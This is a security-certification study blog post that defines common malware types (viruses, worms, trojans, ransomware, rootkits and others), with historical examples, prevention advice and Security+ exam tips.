CyberPathBlogMalware Types Explained: Virus, Worm, Trojan, Ransomware, Rootkit

Security Concepts

Malware Types Explained: Virus vs Worm vs Trojan vs Ransomware vs Rootkit

Not all malware is the same. Understanding the differences between viruses, worms, trojans, ransomware, rootkits, and other malware types is essential for the Security+ exam and real-world incident response.

CyberPath Team·2026-06-29·10 min

Viruses and Worms: Self-Replicating Malware

A virus is malicious code that attaches itself to a legitimate program or file. It requires user action to spread (opening a file, running a program). Types: boot sector virus (infects master boot record), file infector (attaches to .exe files), macro virus (infects document macros), and polymorphic virus (changes code to evade detection).

A worm is self-replicating and spreads without human interaction. Worms exploit network vulnerabilities to move from system to system automatically. WannaCry (2017) used an SMB vulnerability to spread globally in hours, encrypting files and demanding ransom. Unlike viruses, worms are standalone programs that don't need a host file.

Exam tip: Viruses need a host file and user action; worms are standalone and self-replicating over networks.

Trojans and RATs: Disguised Malware

A Trojan (Trojan horse) appears as legitimate software but contains malicious code. Unlike viruses, trojans don't replicate — they trick users into installing them. Common trojan types: backdoor trojan (gives attacker remote control), banking trojan (steals financial credentials like Zeus/Emotet), dropper trojan (downloads other malware), and infostealer trojan (harvests passwords and data).

A Remote Access Trojan (RAT) provides the attacker with full remote control of the infected system. The attacker can browse files, capture keystrokes, activate webcams, and use the system as a pivot point. RATs are commonly delivered through phishing emails with malicious attachments.

Ransomware: The Most Damaging Malware

Ransomware encrypts files and demands payment (usually cryptocurrency) for the decryption key. Modern ransomware uses double extortion: encrypts files AND steals data, threatening to leak it if the ransom isn't paid.

Famous examples: WannaCry (2017), NotPetya (2017 — caused $10B+ in damages), Ryuk (targeted large organizations), REvil/Sodinokibi (Ransomware-as-a-Service), and LockBit (most active ransomware group in 2023-2024).

Prevention: The 3-2-1 backup rule (3 copies, 2 media types, 1 offsite), patch management, restrict RDP access, email filtering, EDR, and user awareness training. Paying the ransom doesn't guarantee data recovery.

Rootkits: Hidden Persistence

A rootkit is designed to hide its presence on a system. It modifies the operating system to conceal processes, files, registry keys, and network connections from security tools. Kernel-mode rootkits run at the OS kernel level and are extremely difficult to detect while the OS is running.

Rootkit detection often requires booting from trusted external media (a clean OS image) to compare system files against known good versions. Some rootkits infect the Master Boot Record (MBR) or UEFI firmware, making them persistent even after OS reinstallation.

Exam tip: Rootkits hide from the OS — detection requires offline scanning. Boot from trusted media to detect and remove.

Other Important Malware Types

Spyware — monitors user activity (keystrokes, browsing habits, credentials) without consent. Keyloggers are a type of spyware.

Botnet — a network of infected computers (bots) controlled by a command-and-control (C2) server. Used for DDoS attacks, spam, credential stuffing, and cryptomining.

Fileless Malware — runs in memory without writing to disk. Uses legitimate system tools (PowerShell, WMI, .NET) to execute malicious code. Evades traditional antivirus because there's no file to scan.

Logic Bomb — malicious code that triggers when a specific condition is met (date, user action, file deletion). Often planted by disgruntled employees.

Adware — displays unwanted advertisements, often bundled with free software. May collect browsing data for targeting.